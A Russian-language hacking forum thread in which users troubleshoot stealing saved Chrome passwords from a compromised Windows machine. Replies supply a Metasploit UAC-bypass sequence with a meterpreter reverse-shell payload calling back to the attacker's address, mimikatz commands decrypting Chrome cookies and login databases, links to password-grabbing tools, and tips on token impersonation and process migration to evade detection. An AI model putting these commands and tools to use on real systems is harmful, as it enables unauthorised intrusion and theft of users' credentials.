 |
|

29.11.2017, 13:05
|
|
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами:
4835747
Репутация:
0
|
|
Не сработало =( Windows server 2012 R2 Build 9600
И так далее. Может еще в какой процесс мигрировать?
|
|
|

29.11.2017, 13:38
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
woolf1514 сказал(а):
Не сработало =( Windows server 2012 R2 Build 9600
И так далее. Может еще в какой процесс мигрировать?
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.
Для того что бы получить такую сессию к примеру можно выполнить следующее:
Код:
Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
|
|
|

29.11.2017, 13:42
|
|
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами:
4835747
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
|
|
|

29.11.2017, 13:46
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
woolf1514 сказал(а):
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
|
|
|

29.11.2017, 13:55
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
от себя дополню)
https://github.com/pourquoibenoit/WinPirate грабит пассы от всего включая браузеры
https://github.com/Marten4n6/EvilOSX.git грабит пасы chrome от огрызков OSX
ну а вообще умеет тоже делать такие вещи
Код:
Код:
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
Автору, жму руку: " молодец что не сдаешься, выход есть всегда!)"
|
|
|

29.11.2017, 13:57
|
|
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами:
9316533
Репутация:
1
|
|
~~DarkNode~~ сказал(а):
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.
Для того что бы получить такую сессию к примеру можно выполнить следующее:
Код:
Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
|
|
|

29.11.2017, 14:05
|
|
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами:
4835747
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
|
|
|

29.11.2017, 14:12
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
adm2 сказал(а):
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
То доступ к домашней папке по идеи не должно запросить повышенный. В случае вульфа у него доступ ограничен к домашней папке админа и требует повышенных привилегий.
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю.
[doublepost=1511950351,1511950029][/doublepost]
woolf1514 сказал(а):
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
Ну у тебя по скрину видно что ексепшн из-за того что скрипт не может зайти в папку локального админа,так как дб файл паролей хрома хранится локально в домашней папки юзера.
|
|
|

29.11.2017, 14:24
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)
|
|
|

29.11.2017, 17:06
|
|
Новичок
Регистрация: 06.11.2016
Сообщений: 0
С нами:
5008631
Репутация:
0
|
|
Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере.
Спасибо.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|